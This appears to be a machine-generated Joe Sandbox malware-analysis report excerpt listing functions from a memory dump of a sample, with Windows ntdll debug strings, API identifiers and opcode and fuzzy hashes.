                                                                                        • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 017F9565
                                                                                        • RtlpFindActivationContextSection_CheckParameters, xrefs: 017F9341, 017F9366
                                                                                        • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 017F936B
                                                                                        • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 017F9346
                                                                                        • GsHd, xrefs: 017AD874
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                        • API String ID: 3446177414-2196497285
                                                                                        • Opcode ID: c27f2f04ab49f673eff60c66da36e53e15a4d60472c6d026254c2613ceb3a8d3
                                                                                        • Instruction ID: 2b2bd2a95849ee9b8eed3cae397bcb26f463bcb43042ce1048612c99118a3d6f
                                                                                        • Opcode Fuzzy Hash: c27f2f04ab49f673eff60c66da36e53e15a4d60472c6d026254c2613ceb3a8d3
                                                                                        • Instruction Fuzzy Hash: E4E17B706083428FDB24CF98C484B6BFBE5BF88318F544A6DFA958B681D771E944CB42
                                                                                        Function 0183F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                        • API String ID: 3446177414-1745908468
                                                                                        • Opcode ID: 3145e375b54e741e48f698a46a9f7a5be7bd330e905f8b77e603058325623225
                                                                                        • Instruction ID: bf7137af0cc3a309a120a952226787d648922edb1783d1ebb2d2ec20e8e25f31
                                                                                        • Opcode Fuzzy Hash: 3145e375b54e741e48f698a46a9f7a5be7bd330e905f8b77e603058325623225
                                                                                        • Instruction Fuzzy Hash: 78911E31900646DFDB16EF68C444AADFBF1BF99B04F18805DE645DB261DB349A40CB86
                                                                                        Function 0180FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                        • API String ID: 3446177414-4227709934
                                                                                        • Opcode ID: 2afcf2e13ff2440284edac34c2f43dab93d69830c9420daa5e1581350f51f179
                                                                                        • Instruction ID: 0fda4dcf49c9121b4209e4ab98631101842d9caa54aa85500b953734355b82d0
                                                                                        • Opcode Fuzzy Hash: 2afcf2e13ff2440284edac34c2f43dab93d69830c9420daa5e1581350f51f179
                                                                                        • Instruction Fuzzy Hash: 96415075A0120DABDF62DF99C840AEEBBB5BF48B04F144119EE14AB381D7719E51CBA0
                                                                                        Function 0183FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                        • API String ID: 3446177414-3492000579
                                                                                        • Opcode ID: c564d327ce8875337228957a062527faeacf82e67498025920570e01b5144df4
                                                                                        • Instruction ID: 907283a913b07d2aea386fe8d67c947c8032213d633ef503baad3942e832cc8b
                                                                                        • Opcode Fuzzy Hash: c564d327ce8875337228957a062527faeacf82e67498025920570e01b5144df4
                                                                                        • Instruction Fuzzy Hash: 5371EF31A0464ADFCB15EF6CD444AAEFBF2BF89704F088059EA45DB252CB359A40CBD5
                                                                                        Function 017865B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • LdrpLoadShimEngine, xrefs: 017E9ABB, 017E9AFC
                                                                                        • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 017E9AF6
                                                                                        • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 017E9AB4
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017E9AC5, 017E9B06
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 3446177414-3589223738
                                                                                        • Opcode ID: 65f00aded5e6abb44565a4ad25c43ff023f12395f3cca8e251966bf3bc88a333
                                                                                        • Instruction ID: ac151521cb85a7b261738c87c7d4a26876758ab8c97b30a28832bc04000c5917
                                                                                        • Opcode Fuzzy Hash: 65f00aded5e6abb44565a4ad25c43ff023f12395f3cca8e251966bf3bc88a333
                                                                                        • Instruction Fuzzy Hash: C1510472B403499BDF24FB6CC858AADFBE2BB54708F040169F951EB299DB709D41CB90
                                                                                        Function 017BD7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlDebugPrintTimes.NTDLL ref: 017BD959
                                                                                          • Part of subcall function 01794859: RtlDebugPrintTimes.NTDLL ref: 017948F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 3446177414-1975516107
                                                                                        • Opcode ID: 09bc6c60f65d83294974045bdd365bf114feded0e8a4c137ab59fd40e355726e
                                                                                        • Instruction ID: 1c73d17e967e7ab4563407ac43cdfb78d24ed5ffcc7bd9f02518b4a6ac4a6536
                                                                                        • Opcode Fuzzy Hash: 09bc6c60f65d83294974045bdd365bf114feded0e8a4c137ab59fd40e355726e
                                                                                        • Instruction Fuzzy Hash: A551EE71A043469FDB35DFA8C4887DEFBB2BF48318F244169D9096B285D774AA81CF80
                                                                                        Function 017BDB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                        • API String ID: 3446177414-3224558752
                                                                                        • Opcode ID: fa38900423ac40bda4e87e2a31d2c9ab96e2b9b72b2459b600c316f0354b640b
                                                                                        • Instruction ID: 21b8425d8c8ced2a8d34c5924a6432534cf917c0060681ed1e802f95538fde73
                                                                                        • Opcode Fuzzy Hash: fa38900423ac40bda4e87e2a31d2c9ab96e2b9b72b2459b600c316f0354b640b
                                                                                        • Instruction Fuzzy Hash: 9E411672600645DFD726EF6CC499BABF7A4EF04728F1441ADEA0187791CF78A980CB91
                                                                                        Function 0183F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • Entry Heap Size , xrefs: 0183F26D
                                                                                        • HEAP: , xrefs: 0183F15D
                                                                                        • ---------------------------------------, xrefs: 0183F279
                                                                                        • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 0183F263
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                        • API String ID: 3446177414-1102453626
                                                                                        • Opcode ID: 01b9837739372dee521115b9dc449933888800023fce10da2c786facb14fffdd
                                                                                        • Instruction ID: 4c019eda1275beba51f657d67e7a5abf9249bda1d6374c54cf829799cc647c22
                                                                                        • Opcode Fuzzy Hash: 01b9837739372dee521115b9dc449933888800023fce10da2c786facb14fffdd
                                                                                        • Instruction Fuzzy Hash: F8418E3AA0061ADFCB25EF1CD484A2ABBE5EF893547298069D508DB315D731EE42CFC1
                                                                                        Function 017BDBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                        • API String ID: 3446177414-1222099010
                                                                                        • Opcode ID: cb1fd25fb316b735c75be7d35c919331a9e8e6171ad1645eaa8b22ca2f0d6fcc
                                                                                        • Instruction ID: 097d893ea98cb222b3c13322350d2122a33111f313a5761f49c3228085721702
                                                                                        • Opcode Fuzzy Hash: cb1fd25fb316b735c75be7d35c919331a9e8e6171ad1645eaa8b22ca2f0d6fcc
                                                                                        • Instruction Fuzzy Hash: E4310932144784DFD736EB6CC459B9AFBE8EF01B58F04409DE94687752CBB8A980C761
                                                                                        Function 01866940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                        • Instruction ID: 8611d5f5d13247184e70757ab4a8adbc029d1cc6aea9a5983d179d346d77a880
                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                        • Instruction Fuzzy Hash: B3021671508382AFD305CF18C894A6BBBE9EFC4704F148A2DF9858B254EB35EA45CB42
                                                                                        Function 017DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-$0$0
                                                                                        • API String ID: 1302938615-699404926
                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                        • Instruction ID: 60d5923a0da840c0473ac73ac1afda2e3b02cbcc376b00b8fb326f8d6b00d551
                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                        • Instruction Fuzzy Hash: 9D81A070E4524D9FEF258E6CC8917FEFBB1AF46360F1E425AE861A7291C7349840CB61
                                                                                        Function 01799126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: $$@
                                                                                        • API String ID: 3446177414-1194432280
                                                                                        • Opcode ID: de824c4c3a53d4ec9959c307d3afd162fb85e0c815c6f57e330c104bb41df6bd
                                                                                        • Instruction ID: 77ce82aa303c67f46c016b86ca409547d03810b0bafd4f46f87e2d02fd2ec5d3
                                                                                        • Opcode Fuzzy Hash: de824c4c3a53d4ec9959c307d3afd162fb85e0c815c6f57e330c104bb41df6bd
                                                                                        • Instruction Fuzzy Hash: 76810C71D002699BDB35CB54CC45BEEB7B4AF48714F1041DAEA19B7680E7309E84CFA0
                                                                                        Function 017C4D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0180362F
                                                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 0180365C
                                                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01803640, 0180366C
                                                                                        • LdrpFindDllActivationContext, xrefs: 01803636, 01803662
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                        • API String ID: 3446177414-3779518884
                                                                                        • Opcode ID: 4ef0c05ef940d99c0acb03f8eb1bd4d6e683008a68e4f3e7cf7e8b02cb4e2cc1
                                                                                        • Instruction ID: 80483136c9a1fb2405093e8d87d7105817b6fc6bc7755e101c6400aed20a29f1
                                                                                        • Opcode Fuzzy Hash: 4ef0c05ef940d99c0acb03f8eb1bd4d6e683008a68e4f3e7cf7e8b02cb4e2cc1
                                                                                        • Instruction Fuzzy Hash: 9C310B72A00615AEEF32BA0CCC69B39F6A4BB01F54F0641AEEF0697151DBA0DDC087D5
                                                                                        Function 018420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$[$]:%u
                                                                                        • API String ID: 48624451-2819853543
                                                                                        • Opcode ID: 96b51515d9a49118bf7fadd51163d17543b38cbd81d33b0649b4783178d8226c
                                                                                        • Instruction ID: 91eb755b2e585d7b8bae1926066ec4f3dd823c38b30fe142a21e609db9107605
                                                                                        • Opcode Fuzzy Hash: 96b51515d9a49118bf7fadd51163d17543b38cbd81d33b0649b4783178d8226c
                                                                                        • Instruction Fuzzy Hash: CD21517AA0051DABDB10DF69D844AAEBBF9AF58744F040126F905E3204EB30EA01CBA1
                                                                                        Function 017D4960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: 0IFw$0IFw$0IFw$X
                                                                                        • API String ID: 3446177414-2496372868
                                                                                        • Opcode ID: 66ae29e36f587979eea76e41e9f845735f5c353e64444c3ab354df9693dea1a9
                                                                                        • Instruction ID: 2e91bac0596b14440c3395dcb790f051a81d279746375eb8bccb361164fbb981
                                                                                        • Opcode Fuzzy Hash: 66ae29e36f587979eea76e41e9f845735f5c353e64444c3ab354df9693dea1a9
                                                                                        • Instruction Fuzzy Hash: AC31AB35D0464EFBCF229F98D844B9DBBB1ABC8748F00406DF9469A245D2748B61CF86
                                                                                        Function 017BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 0180031E
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018002BD
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018002E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                        • API String ID: 0-2474120054
                                                                                        • Opcode ID: 44cb80b936c91fef0c63ad4eeff5b2c9a99cd392dc5ddca842d45d5c147b25f8
                                                                                        • Instruction ID: d67ed5f69d91113b7b4912a22249ac0df49a3e257da353add00a1df56c8e8430
                                                                                        • Opcode Fuzzy Hash: 44cb80b936c91fef0c63ad4eeff5b2c9a99cd392dc5ddca842d45d5c147b25f8
                                                                                        • Instruction Fuzzy Hash: CCE1BC306087469FD726CF28CC84B6ABBE0BB84B54F140A6DF5A5CB2E1D774DA44CB42
                                                                                        Function 0178F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 3446177414-3610490719
                                                                                        • Opcode ID: 202ab8e9245e0269e959425d9caef732a74158ecc36e0f28a2729fbc1922dd5b
                                                                                        • Instruction ID: 3734431a30982921af932533cc005c79956fa6241c549d1948f386a82db27b62
                                                                                        • Opcode Fuzzy Hash: 202ab8e9245e0269e959425d9caef732a74158ecc36e0f28a2729fbc1922dd5b
                                                                                        • Instruction Fuzzy Hash: 70911371784642DFD726FF28C888B2AFBE5BF99710F040559E941CB285DB34E941CB92
                                                                                        Function 01868927 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlDebugPrintTimes.NTDLL ref: 01868B03
                                                                                        • RtlDebugPrintTimes.NTDLL ref: 01868B5B
                                                                                          • Part of subcall function 017D2B60: LdrInitializeThunk.NTDLL ref: 017D2B6A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes$InitializeThunk
                                                                                        • String ID: $File
                                                                                        • API String ID: 1259822791-2412145507
                                                                                        • Opcode ID: 153a147d04541790ddbc6ead2ee6af28b65e5051a3cb3e10419d82e98e9b8b7a
                                                                                        • Instruction ID: 11d6afdad64d4b0336c4c332d31d39be2e1107aa6e2e5c40004338b1d9c08bb8
                                                                                        • Opcode Fuzzy Hash: 153a147d04541790ddbc6ead2ee6af28b65e5051a3cb3e10419d82e98e9b8b7a
                                                                                        • Instruction Fuzzy Hash: 15618F71A1031D9BDB268F28CC55BEDBBBDAB48700F0441A9EA49E6191DA709F84CF54
                                                                                        Function 017B9803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
